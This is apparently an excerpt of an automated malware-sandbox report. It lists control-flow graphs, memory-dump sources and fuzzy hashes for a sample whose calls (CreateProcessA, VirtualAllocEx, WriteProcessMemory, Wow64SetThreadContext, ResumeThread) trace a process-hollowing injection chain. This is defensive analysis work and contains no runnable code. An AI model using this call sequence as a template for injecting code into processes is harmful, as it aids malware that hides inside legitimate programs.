                                                                          • Opcode Fuzzy Hash: bb05edb8a79b6e8aaf314d11b9fb07e128f69bcca5f18806dbd10b3771a9b65e
                                                                          • Instruction Fuzzy Hash: EC41D9B5D013589FCB10CFA9D884AEEFBF0BB49310F20946AE418B7241D774A949CF65

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 391 e74c9c-e75f94 VirtualAllocEx 394 e75f96-e75f9c 391->394 395 e75f9d-e75fdf 391->395 394->395
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(00000000,?,?,?,?), ref: 00E75F84
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.1853628189.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_e70000_x.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 9831d2a197d2f8c94f7ca27190288990ff91a1bf3114f79fb7e7097f4c11cc21
                                                                          • Instruction ID: 207a4644351b060740f31807e6666c4777184d4909804fc2d4b845d0f2e07298
                                                                          • Opcode Fuzzy Hash: 9831d2a197d2f8c94f7ca27190288990ff91a1bf3114f79fb7e7097f4c11cc21
                                                                          • Instruction Fuzzy Hash: A24175B9D052589FCB10CFA9D984A9EFBF1FB19310F20A02AE818B7310D375A941CF64

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 399 e74ca8-e74cb1 401 e74c63 399->401 402 e74cb3-e74cbb 399->402 403 e75b28-e75b8c 401->403 402->403 405 e75ba3-e75be9 Wow64SetThreadContext 403->405 406 e75b8e-e75ba0 403->406 407 e75bf2-e75c36 405->407 408 e75beb-e75bf1 405->408 406->405 408->407
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 00E75BD9
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.1853628189.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_e70000_x.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: 338d3666e9b5cff9c697477b0e4c589f8b9526dbce8aecff6d71ad6a2f387fae
                                                                          • Instruction ID: 9dd4e285cc5b7be570eabb935096ee44e0da00510aeab9e19d5e5cd0915d0d04
                                                                          • Opcode Fuzzy Hash: 338d3666e9b5cff9c697477b0e4c589f8b9526dbce8aecff6d71ad6a2f387fae
                                                                          • Instruction Fuzzy Hash: EB41CAB5D002589FCB10DFAAD884AEEFBF0BB49310F10906AE418B7351D774A945CF65
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 00E75BD9
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.1853628189.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_e70000_x.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: 10c80e4f40c1719b7c47cd3b22a46e4554fb2ab20e53748b59e6efa0c97de2b1
                                                                          • Instruction ID: 01f4f203b8c4ca610a5da36d5dba19b6008fc2b14b354911f97f07c177fcb13c
                                                                          • Opcode Fuzzy Hash: 10c80e4f40c1719b7c47cd3b22a46e4554fb2ab20e53748b59e6efa0c97de2b1
                                                                          • Instruction Fuzzy Hash: 994188B5D012589FCB10CFAAD984AEEFBF0BB49310F20906AE418B7251D778A945CF64
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 00E75BD9
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.1853628189.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_e70000_x.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: 7d63c3add9088038fbc6fe14b2fb0134148874d5c5550447815a7e2b887f5697
                                                                          • Instruction ID: 63e7aae2e3960a4c209892583ffb9d565d02dcd5bd3f343b76025f4374d19652
                                                                          • Opcode Fuzzy Hash: 7d63c3add9088038fbc6fe14b2fb0134148874d5c5550447815a7e2b887f5697
                                                                          • Instruction Fuzzy Hash: F54188B5D012589FCB14CFAAD984AEEFBF0BB49310F20906AE418B7251D778A945CF64
                                                                          APIs
                                                                          • ResumeThread.KERNELBASE(00000000), ref: 00E7668D
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.1853628189.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_e70000_x.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 708c0de4b14d0790845ab4fbf5e5c9df09b38c4d15c25a67acb31eb50b451210
                                                                          • Instruction ID: c55bb740de244f4018372622578da460f4170f909e1cacded0f6e3d15a49e93c
                                                                          • Opcode Fuzzy Hash: 708c0de4b14d0790845ab4fbf5e5c9df09b38c4d15c25a67acb31eb50b451210
                                                                          • Instruction Fuzzy Hash: A231A9B4D012189FCB10DFA9D984A9EFBF4EB49314F20906AE818B7351D775A904CFA8
                                                                          APIs
                                                                          • ResumeThread.KERNELBASE(00000000), ref: 00E7668D
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.1853628189.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_e70000_x.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 5d312721839cc279999556a71ea8fdd76bd35d5f31de4bb19bf722f65dc2df35
                                                                          • Instruction ID: 8d9ec763bb8a0ecf466b389a332bee91033951cde7cfe9f8d37ff3348aa72128
                                                                          • Opcode Fuzzy Hash: 5d312721839cc279999556a71ea8fdd76bd35d5f31de4bb19bf722f65dc2df35
                                                                          • Instruction Fuzzy Hash: 7131B8B8D012589FCB10CFA9E984A9EFBF0AB49310F14906AE819B3350C775A905CFA4

                                                                          Execution Graph

                                                                          Execution Coverage:25.8%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:152
                                                                          Total number of Limit Nodes:7
                                                                          execution_graph 3145 2ec4c78 3146 2ec4c7d ReadProcessMemory 3145->3146 3148 2ec5d7e 3146->3148 3162 2ec4c18 3163 2ec4c1d CreateProcessA 3162->3163 3165 2ec5848 3163->3165 3149 2ec627b 3150 2ec6280 WriteProcessMemory 3149->3150 3152 2ec6367 3150->3152 3158 2ec660b 3159 2ec6610 ResumeThread 3158->3159 3161 2ec669f 3159->3161 2978 2ec4000 2979 2ec4024 2978->2979 2980 2ec40fa 2979->2980 2985 2ec52c8 2979->2985 2999 2ec4c43 2979->2999 3017 2ec4cc0 2979->3017 3035 2ec4cf0 2979->3035 2987 2ec5092 2985->2987 2986 2ec5316 2986->2980 2987->2986 3049 2ec5408 2987->3049 3053 2ec53f9 2987->3053 3057 2ec59f0 2987->3057 3061 2ec59e0 2987->3061 3065 2ec5c48 2987->3065 3069 2ec5c38 2987->3069 3073 2ec5de8 2987->3073 3077 2ec5fe8 2987->3077 3083 2ec5ff8 2987->3083 3089 2ec63c8 2987->3089 3097 2ec63d8 2987->3097 3000 2ec4c4b 2999->3000 3003 2ec4cb3 WriteProcessMemory 3000->3003 3005 2ec4d07 3000->3005 3001 2ec5316 3001->2980 3004 2ec6367 3003->3004 3004->2980 3005->3001 3006 2ec5fe8 WriteProcessMemory 3005->3006 3007 2ec5ff8 WriteProcessMemory 3005->3007 3008 2ec5c48 ReadProcessMemory 3005->3008 3009 2ec5c38 ReadProcessMemory 3005->3009 3010 2ec5408 CreateProcessA 3005->3010 3011 2ec53f9 CreateProcessA 3005->3011 3012 2ec59e0 Wow64SetThreadContext 3005->3012 3013 2ec59f0 Wow64SetThreadContext 3005->3013 3014 2ec5de8 VirtualAllocEx 3005->3014 3015 2ec63c8 3 API calls 3005->3015 3016 2ec63d8 3 API calls 3005->3016 3006->3005 3007->3005 3008->3005 3009->3005 3010->3005 3011->3005 3012->3005 3013->3005 3014->3005 3015->3005 3016->3005 3018 2ec4cc5 3017->3018 3020 2ec4d1f 3018->3020 3021 2ec4ccb Wow64SetThreadContext 3018->3021 3019 2ec5316 3019->2980 3020->3019 3024 2ec63c8 3 API calls 3020->3024 3025 2ec63d8 3 API calls 3020->3025 3026 2ec5fe8 WriteProcessMemory 3020->3026 3027 2ec5ff8 WriteProcessMemory 3020->3027 3028 2ec5c48 ReadProcessMemory 3020->3028 3029 2ec5c38 ReadProcessMemory 3020->3029 3030 2ec5408 CreateProcessA 3020->3030 3031 2ec53f9 CreateProcessA 3020->3031 3032 2ec59e0 Wow64SetThreadContext 3020->3032 3033 2ec59f0 Wow64SetThreadContext 3020->3033 3034 2ec5de8 VirtualAllocEx 3020->3034 3023 2ec5beb 3021->3023 3023->2980 3024->3020 3025->3020 3026->3020 3027->3020 3028->3020 3029->3020 3030->3020 3031->3020 3032->3020 3033->3020 3034->3020 3037 2ec4cf5 3035->3037 3036 2ec5316 3036->2980 3037->3036 3038 2ec59e0 Wow64SetThreadContext 3037->3038 3039 2ec59f0 Wow64SetThreadContext 3037->3039 3040 2ec5de8 VirtualAllocEx 3037->3040 3041 2ec63c8 3 API calls 3037->3041 3042 2ec63d8 3 API calls 3037->3042 3043 2ec5408 CreateProcessA 3037->3043 3044 2ec53f9 CreateProcessA 3037->3044 3045 2ec5fe8 WriteProcessMemory 3037->3045 3046 2ec5ff8 WriteProcessMemory 3037->3046 3047 2ec5c48 ReadProcessMemory 3037->3047 3048 2ec5c38 ReadProcessMemory 3037->3048 3038->3037 3039->3037 3040->3037 3041->3037 3042->3037 3043->3037 3044->3037 3045->3037 3046->3037 3047->3037 3048->3037 3050 2ec542c 3049->3050 3105 2ec4c24 3050->3105 3054 2ec542c 3053->3054 3055 2ec4c24 CreateProcessA 3054->3055 3056 2ec54a6 3055->3056 3056->2987 3058 2ec59f1 3057->3058 3060 2ec5a88 3058->3060 3109 2ec4c5c 3058->3109 3060->2987 3062 2ec59ec 3061->3062 3063 2ec4c5c Wow64SetThreadContext 3062->3063 3064 2ec5a88 3062->3064 3063->3064 3064->2987 3066 2ec5c49 3065->3066 3113 2ec4c84 3066->3113 3070 2ec5c3c 3069->3070 3071 2ec4c84 ReadProcessMemory 3070->3071 3072 2ec5c8b 3071->3072 3072->2987 3074 2ec5e0f 3073->3074 3117 2ec4c9c 3074->3117 3076 2ec5e57 3076->2987 3078 2ec5fec 3077->3078 3121 2ec4cb4 3078->3121 3080 2ec6259 3080->2987 3081 2ec60ab 3081->3080 3082 2ec4cb4 WriteProcessMemory 3081->3082 3082->3081 3084 2ec5ff9 3083->3084 3085 2ec4cb4 WriteProcessMemory 3084->3085 3088 2ec60ab 3085->3088 3086 2ec6259 3086->2987 3087 2ec4cb4 WriteProcessMemory 3087->3088 3088->3086 3088->3087 3090 2ec63ff 3089->3090 3091 2ec4cb4 WriteProcessMemory 3090->3091 3092 2ec6464 3091->3092 3096 2ec6517 3092->3096 3125 2ec4ccc 3092->3125 3095 2ec65a1 3095->2987 3129 2ec4ce4 3096->3129 3098 2ec63ff 3097->3098 3099 2ec4cb4 WriteProcessMemory 3098->3099 3100 2ec6464 3099->3100 3101 2ec4ccc Wow64SetThreadContext 3100->3101 3104 2ec6517 3100->3104 3101->3104 3102 2ec4ce4 ResumeThread 3103 2ec65a1 3102->3103 3103->2987 3104->3102 3106 2ec5510 CreateProcessA 3105->3106 3108 2ec5848 3106->3108 3110 2ec5b28 Wow64SetThreadContext 3109->3110 3112 2ec5beb 3110->3112 3112->3060 3114 2ec5cb8 ReadProcessMemory 3113->3114 3116 2ec5c8b 3114->3116 3116->2987 3118 2ec5ed8 VirtualAllocEx 3117->3118 3120 2ec5f96 3118->3120 3120->3076 3122 2ec6280 WriteProcessMemory 3121->3122 3124 2ec6367 3122->3124 3124->3081 3126 2ec5b28 Wow64SetThreadContext 3125->3126 3128 2ec5beb 3126->3128 3128->3096 3130 2ec6610 ResumeThread 3129->3130 3132 2ec669f 3130->3132 3132->3095 3141 2ec4c90 3142 2ec4c95 VirtualAllocEx 3141->3142 3144 2ec5f96 3142->3144 3153 2ec4c30 3155 2ec4c35 3153->3155 3154 2ec4bfc 3155->3154 3156 2ec5f2b VirtualAllocEx 3155->3156 3157 2ec5f96 3156->3157 3166 2ec3ff0 3168 2ec3ff4 3166->3168 3167 2ec40fa 3168->3167 3169 2ec52c8 7 API calls 3168->3169 3170 2ec4cf0 7 API calls 3168->3170 3171 2ec4cc0 8 API calls 3168->3171 3172 2ec4c43 8 API calls 3168->3172 3169->3167 3170->3167 3171->3167 3172->3167 3173 2ec5b23 3174 2ec5b28 Wow64SetThreadContext 3173->3174 3176 2ec5beb 3174->3176

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 92 2ec4c43-2ec4c49 93 2ec4c9f-2ec4cb1 92->93 94 2ec4c4b-2ec4c66 92->94 96 2ec4d07-2ec5043 93->96 97 2ec4cb3-2ec62ef 93->97 94->93 99 2ec504a-2ec508d 96->99 100 2ec5045 96->100 105 2ec6306-2ec6365 WriteProcessMemory 97->105 106 2ec62f1-2ec6303 97->106 101 2ec52ff-2ec5310 99->101 100->99 103 2ec5316-2ec531d 101->103 104 2ec5092-2ec509b 101->104 155 2ec509e call 2ec5408 104->155 156 2ec509e call 2ec53f9 104->156 108 2ec636e-2ec63b8 105->108 109 2ec6367-2ec636d 105->109 106->105 109->108 110 2ec50a4-2ec50b8 113 2ec50ba-2ec50f8 call 2ec4850 110->113 114 2ec5103-2ec512d 110->114 113->114 157 2ec5130 call 2ec59e0 114->157 158 2ec5130 call 2ec59f0 114->158 122 2ec5136-2ec515d 123 2ec515f 122->123 124 2ec5164-2ec5177 122->124 123->124 153 2ec517a call 2ec5c48 124->153 154 2ec517a call 2ec5c38 124->154 126 2ec5180-2ec5194 127 2ec51df-2ec51f2 126->127 128 2ec5196-2ec51d4 call 2ec3b10 126->128 129 2ec51f4-2ec521a call 2ec0824 127->129 130 2ec5266-2ec5293 call 2ec5de8 127->130 128->127 137 2ec521c-2ec525a call 2ec4850 129->137 138 2ec5265 129->138 151 2ec5296 call 2ec5fe8 130->151 152 2ec5296 call 2ec5ff8 130->152 137->138 138->130 140 2ec529c-2ec52aa 142 2ec52ac 140->142 143 2ec52b1-2ec52ba 140->143 142->143 160 2ec52bd call 2ec63c8 143->160 161 2ec52bd call 2ec63d8 143->161 147 2ec52c3-2ec52fa 147->101 147->103 151->140 152->140 153->126 154->126 155->110 156->110 157->122 158->122 160->147 161->147
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,?), ref: 02EC6355
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1854140939.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2ec0000_x.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: c07d92f1179bdee26adc3a8ec7a5499c3b6917add7aa72e4db23578ad7edbcb6
                                                                          • Instruction ID: 23935f31d9e42f43379bf5b1078dc48aebdf6f93ddbc5465bd7a3fc9685de299
                                                                          • Opcode Fuzzy Hash: c07d92f1179bdee26adc3a8ec7a5499c3b6917add7aa72e4db23578ad7edbcb6
                                                                          • Instruction Fuzzy Hash: 5DE1EF74D00218CFDB24CFA9D984AEDBBF2FF89314F24906AE419AB251D7346986CF54

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 162 2ec4cc0-2ec4cc9 164 2ec4d1f-2ec5043 162->164 165 2ec4ccb-2ec5b8c 162->165 167 2ec504a-2ec508d 164->167 168 2ec5045 164->168 173 2ec5b8e-2ec5ba0 165->173 174 2ec5ba3-2ec5be9 Wow64SetThreadContext 165->174 169 2ec52ff-2ec5310 167->169 168->167 171 2ec5316-2ec531d 169->171 172 2ec5092-2ec509b 169->172 225 2ec509e call 2ec5408 172->225 226 2ec509e call 2ec53f9 172->226 173->174 176 2ec5beb-2ec5bf1 174->176 177 2ec5bf2-2ec5c36 174->177 176->177 178 2ec50a4-2ec50b8 181 2ec50ba-2ec50f8 call 2ec4850 178->181 182 2ec5103-2ec512d 178->182 181->182 227 2ec5130 call 2ec59e0 182->227 228 2ec5130 call 2ec59f0 182->228 190 2ec5136-2ec515d 191 2ec515f 190->191 192 2ec5164-2ec5177 190->192 191->192 223 2ec517a call 2ec5c48 192->223 224 2ec517a call 2ec5c38 192->224 194 2ec5180-2ec5194 195 2ec51df-2ec51f2 194->195 196 2ec5196-2ec51d4 call 2ec3b10 194->196 197 2ec51f4-2ec521a call 2ec0824 195->197 198 2ec5266-2ec5293 call 2ec5de8 195->198 196->195 205 2ec521c-2ec525a call 2ec4850 197->205 206 2ec5265 197->206 221 2ec5296 call 2ec5fe8 198->221 222 2ec5296 call 2ec5ff8 198->222 205->206 206->198 208 2ec529c-2ec52aa 210 2ec52ac 208->210 211 2ec52b1-2ec52ba 208->211 210->211 219 2ec52bd call 2ec63c8 211->219 220 2ec52bd call 2ec63d8 211->220 215 2ec52c3-2ec52fa 215->169 215->171 219->215 220->215 221->208 222->208 223->194 224->194 225->178 226->178 227->190 228->190
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 02EC5BD9
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1854140939.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2ec0000_x.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: 3ec4b5cd40ab767206351bc56d88dfe5e7ac25d58a2a829fbac48a571eac7204
                                                                          • Instruction ID: 17b4eb1c578218402ad3864a3c99db8e36ce6850fb4a7f1ecafb0761905287e8
                                                                          • Opcode Fuzzy Hash: 3ec4b5cd40ab767206351bc56d88dfe5e7ac25d58a2a829fbac48a571eac7204
                                                                          • Instruction Fuzzy Hash: F2511FB1D002188FCB14CFAAD984ADEFBF1AF89314F20902AE418B7250D774694ACF54

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 230 2ec5504-2ec550a 231 2ec550c-2ec550f 230->231 232 2ec5511-2ec55b3 230->232 231->232 235 2ec5615-2ec5640 232->235 236 2ec55b5-2ec55e5 232->236 239 2ec56a2-2ec56fb 235->239 240 2ec5642-2ec5672 235->240 236->235 243 2ec55e7-2ec55ec 236->243 247 2ec56fd-2ec572a 239->247 248 2ec575a-2ec5846 CreateProcessA 239->248 240->239 252 2ec5674-2ec5679 240->252 245 2ec55ee-2ec55f8 243->245 246 2ec560f-2ec5612 243->246 250 2ec55fc-2ec560b 245->250 251 2ec55fa 245->251 246->235 247->248 262 2ec572c-2ec5731 247->262 271 2ec584f-2ec5929 248->271 272 2ec5848-2ec584e 248->272 250->250 253 2ec560d 250->253 251->250 256 2ec569c-2ec569f 252->256 257 2ec567b-2ec5685 252->257 253->246 256->239 259 2ec5689-2ec5698 257->259 260 2ec5687 257->260 259->259 263 2ec569a 259->263 260->259 264 2ec5754-2ec5757 262->264 265 2ec5733-2ec573d 262->265 263->256 264->248 267 2ec573f 265->267 268 2ec5741-2ec5750 265->268 267->268 268->268 269 2ec5752 268->269 269->264 283 2ec5939-2ec593d 271->283 284 2ec592b-2ec592f 271->284 272->271 286 2ec594d-2ec5951 283->286 287 2ec593f-2ec5943 283->287 284->283 285 2ec5931 284->285 285->283 289 2ec5961-2ec5965 286->289 290 2ec5953-2ec5957 286->290 287->286 288 2ec5945 287->288 288->286 291 2ec599b-2ec59a6 289->291 292 2ec5967-2ec5990 289->292 290->289 293 2ec5959 290->293 297 2ec59a7 291->297 292->291 293->289 297->297
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(?,?,040F3580,040F3584,02EC54A6,?,?,?,?,?), ref: 02EC5833
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1854140939.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2ec0000_x.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 4d3d5f0e73818a8b9b1a1d2708a4b3645d0efff1b94b08a2413d9a27314aba50
                                                                          • Instruction ID: 5ae554dfab4b4b82a1ca96f0b92a73540d3b1dbbf91e149dfb416655e4fdeee4
                                                                          • Opcode Fuzzy Hash: 4d3d5f0e73818a8b9b1a1d2708a4b3645d0efff1b94b08a2413d9a27314aba50
                                                                          • Instruction Fuzzy Hash: A7D11670D002198FDB24DFA8C941BEDBBF1BF59304F10A1A9D859B7250DB74AA86CF94

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 298 2ec4c18-2ec55b3 303 2ec5615-2ec5640 298->303 304 2ec55b5-2ec55e5 298->304 307 2ec56a2-2ec56fb 303->307 308 2ec5642-2ec5672 303->308 304->303 311 2ec55e7-2ec55ec 304->311 315 2ec56fd-2ec572a 307->315 316 2ec575a-2ec5846 CreateProcessA 307->316 308->307 320 2ec5674-2ec5679 308->320 313 2ec55ee-2ec55f8 311->313 314 2ec560f-2ec5612 311->314 318 2ec55fc-2ec560b 313->318 319 2ec55fa 313->319 314->303 315->316 330 2ec572c-2ec5731 315->330 339 2ec584f-2ec5929 316->339 340 2ec5848-2ec584e 316->340 318->318 321 2ec560d 318->321 319->318 324 2ec569c-2ec569f 320->324 325 2ec567b-2ec5685 320->325 321->314 324->307 327 2ec5689-2ec5698 325->327 328 2ec5687 325->328 327->327 331 2ec569a 327->331 328->327 332 2ec5754-2ec5757 330->332 333 2ec5733-2ec573d 330->333 331->324 332->316 335 2ec573f 333->335 336 2ec5741-2ec5750 333->336 335->336 336->336 337 2ec5752 336->337 337->332 351 2ec5939-2ec593d 339->351 352 2ec592b-2ec592f 339->352 340->339 354 2ec594d-2ec5951 351->354 355 2ec593f-2ec5943 351->355 352->351 353 2ec5931 352->353 353->351 357 2ec5961-2ec5965 354->357 358 2ec5953-2ec5957 354->358 355->354 356 2ec5945 355->356 356->354 359 2ec599b-2ec59a6 357->359 360 2ec5967-2ec5990 357->360 358->357 361 2ec5959 358->361 365 2ec59a7 359->365 360->359 361->357 365->365
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(?,?,040F3580,040F3584,02EC54A6,?,?,?,?,?), ref: 02EC5833
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1854140939.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2ec0000_x.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 1f87a755ea8da158f05bcd3eea6c00adab7feefcf9b8c120682d516c71e0721c
                                                                          • Instruction ID: ea824b842485372a5cda3f0fb98f0327efea2025bf20f812d3fc131b7de5af60
                                                                          • Opcode Fuzzy Hash: 1f87a755ea8da158f05bcd3eea6c00adab7feefcf9b8c120682d516c71e0721c
                                                                          • Instruction Fuzzy Hash: E0D12770D002298FDB24DFA8C941BEDBBF1BF49304F10A5A9D859B7250DB74AA85CF94

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 366 2ec4c24-2ec55b3 370 2ec5615-2ec5640 366->370 371 2ec55b5-2ec55e5 366->371 374 2ec56a2-2ec56fb 370->374 375 2ec5642-2ec5672 370->375 371->370 378 2ec55e7-2ec55ec 371->378 382 2ec56fd-2ec572a 374->382 383 2ec575a-2ec5846 CreateProcessA 374->383 375->374 387 2ec5674-2ec5679 375->387 380 2ec55ee-2ec55f8 378->380 381 2ec560f-2ec5612 378->381 385 2ec55fc-2ec560b 380->385 386 2ec55fa 380->386 381->370 382->383 397 2ec572c-2ec5731 382->397 406 2ec584f-2ec5929 383->406 407 2ec5848-2ec584e 383->407 385->385 388 2ec560d 385->388 386->385 391 2ec569c-2ec569f 387->391 392 2ec567b-2ec5685 387->392 388->381 391->374 394 2ec5689-2ec5698 392->394 395 2ec5687 392->395 394->394 398 2ec569a 394->398 395->394 399 2ec5754-2ec5757 397->399 400 2ec5733-2ec573d 397->400 398->391 399->383 402 2ec573f 400->402 403 2ec5741-2ec5750 400->403 402->403 403->403 404 2ec5752 403->404 404->399 418 2ec5939-2ec593d 406->418 419 2ec592b-2ec592f 406->419 407->406 421 2ec594d-2ec5951 418->421 422 2ec593f-2ec5943 418->422 419->418 420 2ec5931 419->420 420->418 424 2ec5961-2ec5965 421->424 425 2ec5953-2ec5957 421->425 422->421 423 2ec5945 422->423 423->421 426 2ec599b-2ec59a6 424->426 427 2ec5967-2ec5990 424->427 425->424 428 2ec5959 425->428 432 2ec59a7 426->432 427->426 428->424 432->432
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(?,?,040F3580,040F3584,02EC54A6,?,?,?,?,?), ref: 02EC5833
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1854140939.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2ec0000_x.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: ef77050daa910070b7d12e926a26f1ecf8600796d69ac80e75dc1b1249b0cc16
                                                                          • Instruction ID: 21ff54f335b651858ea39e82040f12c801c15a8eccfc6c4333d4c4e7da834820
                                                                          • Opcode Fuzzy Hash: ef77050daa910070b7d12e926a26f1ecf8600796d69ac80e75dc1b1249b0cc16
                                                                          • Instruction Fuzzy Hash: 4FD11670D002298FDB24DFA8C941BEDBBF1BF49304F10A5A9D859B7250DB74AA85CF94

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 433 2ec4c30-2ec4c39 435 2ec4c8f-2ec5f29 433->435 436 2ec4c3b-2ec4c41 433->436 441 2ec5f2b-2ec5f94 VirtualAllocEx 435->441 442 2ec5f9d-2ec5fdf 441->442 443 2ec5f96-2ec5f9c 441->443 443->442
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(00000000,?,?,?,?), ref: 02EC5F84
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1854140939.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2ec0000_x.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: d67da1ebcc5ea20b880152e8bbcad874f621ab156545e2080a2181000f02d2b2
                                                                          • Instruction ID: 4e99ceb8c09c9e407d93c16946227449294a2d1c4ba15aff1490e4d10d5da786
                                                                          • Opcode Fuzzy Hash: d67da1ebcc5ea20b880152e8bbcad874f621ab156545e2080a2181000f02d2b2
                                                                          • Instruction Fuzzy Hash: 0041CCB5D052589FCB00CFE9D984ADEFBF0EB59310F20A06AE818B7251D335A946CB64

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 447 2ec4cb4-2ec62ef 450 2ec6306-2ec6365 WriteProcessMemory 447->450 451 2ec62f1-2ec6303 447->451 452 2ec636e-2ec63b8 450->452 453 2ec6367-2ec636d 450->453 451->450 453->452
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,?), ref: 02EC6355
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1854140939.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2ec0000_x.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: e836f58d799c18622a34188636950d6bb680b46559b02e0e08192d80d23a8a43
                                                                          • Instruction ID: ce5b9d874c87454a30d53b4e57e7512163a4c9f8e98ace41e88e08d8de13a318
                                                                          • Opcode Fuzzy Hash: e836f58d799c18622a34188636950d6bb680b46559b02e0e08192d80d23a8a43
